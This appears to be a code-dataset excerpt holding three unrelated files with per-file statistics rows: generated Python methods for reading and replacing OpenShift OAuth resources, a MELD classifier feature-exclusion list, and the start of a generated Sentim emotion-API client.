read the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_authorize_token(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, **kwargs)
else:
(data) = self.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, **kwargs)
return data
def read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, **kwargs):
"""
read the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_oauth_openshift_io_v1_o_auth_client(self, name, **kwargs):
"""
read the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_client(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, **kwargs)
else:
(data) = self.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, **kwargs)
return data
def read_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, **kwargs):
"""
read the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClient',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_oauth_openshift_io_v1_o_auth_client_authorization(self, name, **kwargs):
"""
read the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_client_authorization(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, **kwargs)
else:
(data) = self.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, **kwargs)
return data
def read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, **kwargs):
"""
read the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorization',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
"""
replace the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
else:
(data) = self.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
return data
def replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
"""
replace the specified OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_access_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
"""
replace the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
else:
(data) = self.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
return data
def replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
"""
replace the specified OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_authorize_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
"""
replace the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
else:
(data) = self.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
return data
def replace_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
"""
replace the specified OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_client`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClient',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
"""
replace the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
else:
(data) = self.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
return data
def replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
"""
replace the specified OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_client_authorization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorization',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.406913 | 3,330 | 0.615254 | 18,866 | 173,551 | 5.413018 | 0.022739 | 0.045436 | 0.041362 | 0.046533 | 0.967607 | 0.967137 | 0.967137 | 0.965522 | 0.964709 | 0.964709 | 0 | 0.003013 | 0.307633 | 173,551 | 3,442 | 3,331 | 50.421557 | 0.846864 | 0.372017 | 0 | 0.867859 | 0 | 0 | 0.211975 | 0.084516 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034045 | false | 0 | 0.004039 | 0 | 0.088863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4e68982216bba5a87460699d175ea7c9db87199c | 2,611 | py | Python | meld_classifier/set_basic.py | MELDProject/meld_classifier | 487a6a0df2e7c359101a7a58100f438c5aac6a60 | [
"MIT"
] | 1 | 2022-03-16T15:01:07.000Z | 2022-03-16T15:01:07.000Z | meld_classifier/set_basic.py | MELDProject/meld_classifier | 487a6a0df2e7c359101a7a58100f438c5aac6a60 | [
"MIT"
] | 1 | 2022-02-14T13:46:21.000Z | 2022-02-14T13:46:21.000Z | meld_classifier/set_basic.py | MELDProject/meld_classifier | 487a6a0df2e7c359101a7a58100f438c5aac6a60 | [
"MIT"
] | null | null | null | ## definitions of different feature sets for experiments
exclude_set = {
1: [
".combat.on_lh.thickness.sm10.mgh",
".combat.on_lh.w-g.pct.sm10.mgh",
".combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
".combat.on_lh.wm_FLAIR_1.sm10.mgh",
".combat.on_lh.curv.mgh",
".combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.sm10.mgh",
".combat.on_lh.pial.K_filtered.sm20.mgh",
],
2: [
".combat.on_lh.thickness.sm10.mgh",
".combat.on_lh.w-g.pct.sm10.mgh",
".combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
".combat.on_lh.wm_FLAIR_1.sm10.mgh",
".combat.on_lh.curv.mgh",
".combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
".combat.on_lh.gm_FLAIR_0.sm10.mgh",
".combat.on_lh.pial.K_filtered.sm20.mgh" ".inter_z.asym.intra_z.combat.on_lh.curv.mgh",
".inter_z.asym.intra_z.combat.on_lh.sulc.mgh",
".inter_z.intra_z.combat.on_lh.curv.mgh",
".inter_z.intra_z.combat.on_lh.sulc.mgh",
],
3: [],
4: [
".inter_z.asym.intra_z.combat.on_lh.curv.mgh",
".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.pial.K_filtered.sm20.mgh",
".inter_z.asym.intra_z.combat.on_lh.sulc.mgh",
".inter_z.asym.intra_z.combat.on_lh.thickness.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.w-g.pct.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
".inter_z.asym.intra_z.combat.on_lh.wm_FLAIR_1.sm10.mgh",
".inter_z.intra_z.combat.on_lh.curv.mgh",
".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.sm10.mgh",
".inter_z.intra_z.combat.on_lh.pial.K_filtered.sm20.mgh",
".inter_z.intra_z.combat.on_lh.sulc.mgh",
".inter_z.intra_z.combat.on_lh.thickness.sm10.mgh",
".inter_z.intra_z.combat.on_lh.w-g.pct.sm10.mgh",
".inter_z.intra_z.combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
".inter_z.intra_z.combat.on_lh.wm_FLAIR_1.sm10.mgh",
],
}
| 45.807018 | 95 | 0.644198 | 476 | 2,611 | 3.216387 | 0.081933 | 0.240366 | 0.300457 | 0.237753 | 0.960157 | 0.960157 | 0.960157 | 0.960157 | 0.960157 | 0.957544 | 0 | 0.057594 | 0.175412 | 2,611 | 56 | 96 | 46.625 | 0.653507 | 0.020299 | 0 | 0.5 | 0 | 0 | 0.756556 | 0.756556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
4e8c8f872caef3b6c8d76e95aa35c3183c47071f | 34,290 | py | Python | sentim/api/default_api.py | Sentim-LLC/sentim_client | 73c1dfa749e4139b4da6d1665d68409b86979fb1 | [
"Apache-2.0"
] | 2 | 2020-11-29T20:05:41.000Z | 2021-03-29T02:35:21.000Z | sentim/api/default_api.py | Sentim-LLC/sentim_client | 73c1dfa749e4139b4da6d1665d68409b86979fb1 | [
"Apache-2.0"
] | null | null | null | sentim/api/default_api.py | Sentim-LLC/sentim_client | 73c1dfa749e4139b4da6d1665d68409b86979fb1 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Sentim's Emotion APIs
An emotion recognition api that tells you the emotion of text, and not just the connotation. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: help@sentimllc.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sentim.api_client import ApiClient
from sentim.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def detect_batch_emotion(self, batch_text, **kwargs): # noqa: E501
"""Detect the emotion of a list of strings # noqa: E501
Given a list of strings and the language of all strings, this method produces the emotion scores for each input string. Note: This method assumes that all of the strings are unrelated to each other, i.e. this method does not use context. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_batch_emotion(batch_text, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param BatchText batch_text: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: BatchEmotionResponse
If the method is called asynchronously,
returns the request thread.
